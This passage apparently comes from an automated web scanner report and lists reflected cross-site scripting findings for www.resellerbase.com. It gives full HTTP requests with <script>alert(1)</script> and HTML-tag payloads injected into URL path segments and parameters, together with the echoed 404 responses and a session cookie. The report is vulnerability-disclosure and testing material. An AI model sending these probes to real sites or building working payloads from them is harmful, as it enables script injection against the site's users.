Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6adf9<script>alert(1)</script>392ba4593f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6adf9<script>alert(1)</script>392ba4593f9/10/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6adf9<script>alert(1)</script>392ba4593f9/10/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.864. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe6a3<script>alert(1)</script>70f0c93386e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10fe6a3<script>alert(1)</script>70f0c93386e/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10fe6a3<script>alert(1)</script>70f0c93386e/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.865. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2d8da<script>alert(1)</script>4a06d498cac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes2d8da<script>alert(1)</script>4a06d498cac/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes2d8da<script>alert(1)</script>4a06d498cac/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.866. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3608c<script>alert(1)</script>2303fd9c4df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos3608c<script>alert(1)</script>2303fd9c4df/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos3608c<script>alert(1)</script>2303fd9c4df/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.867. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b01f9<script>alert(1)</script>e204ad6d230 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/imagesb01f9<script>alert(1)</script>e204ad6d230/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/imagesb01f9<script>alert(1)</script>e204ad6d230/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.868. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 374bf<script>alert(1)</script>73fd10304ef was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating374bf<script>alert(1)</script>73fd10304ef/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating374bf<script>alert(1)</script>73fd10304ef/2half.gif was not found on this server.</p>
...[SNIP]...

2.869. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 300e5<script>alert(1)</script>a07338ec638 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/2half.gif300e5<script>alert(1)</script>a07338ec638 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/2half.gif300e5<script>alert(1)</script>a07338ec638 was not found on this server.</p>
...[SNIP]...

2.870. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d8a5e<script>alert(1)</script>e494879d5c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/2half.gif?d8a5e<script>alert(1)</script>e494879d5c9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/2half.gif?d8a5e<script>alert(1)</script>e494879d5c9=1 was not found on this server.</p>
...[SNIP]...

2.871. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea134<script>alert(1)</script>eff89dd9700 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailea134<script>alert(1)</script>eff89dd9700/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailea134<script>alert(1)</script>eff89dd9700/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.872. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c35a<script>alert(1)</script>0fa9bf857ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/102c35a<script>alert(1)</script>0fa9bf857ec/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/102c35a<script>alert(1)</script>0fa9bf857ec/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.873. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b2ba<script>alert(1)</script>483786ce87a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes6b2ba<script>alert(1)</script>483786ce87a/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes6b2ba<script>alert(1)</script>483786ce87a/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.874. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84953<script>alert(1)</script>1768e6af068 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos84953<script>alert(1)</script>1768e6af068/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos84953<script>alert(1)</script>1768e6af068/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.875. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8e8e4<script>alert(1)</script>4e27a64ab11 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images8e8e4<script>alert(1)</script>4e27a64ab11/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images8e8e4<script>alert(1)</script>4e27a64ab11/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.876. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 464e1<script>alert(1)</script>9e74ad4692 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating464e1<script>alert(1)</script>9e74ad4692/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating464e1<script>alert(1)</script>9e74ad4692/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.877. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f0dd9<script>alert(1)</script>fa315a1150d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/search.phpf0dd9<script>alert(1)</script>fa315a1150d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.phpf0dd9<script>alert(1)</script>fa315a1150d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.878. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c5cc2<a>3909e78ee18 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchc5cc2<a>3909e78ee18&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchc5cc2<a>3909e78ee18&opt=2 was not found on this server.</p>
...[SNIP]...

2.879. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eca48<a>913d5b418a6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...eca48<a>913d5b418a6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.php?keyword=search...eca48<a>913d5b418a6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.880. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 53dfd<script>alert(1)</script>92fa315e11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&53dfd<script>alert(1)</script>92fa315e11d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&53dfd<script>alert(1)</script>92fa315e11d=1 was not found on this server.</p>
...[SNIP]...

2.881. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a52fd<a>319afd6050b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

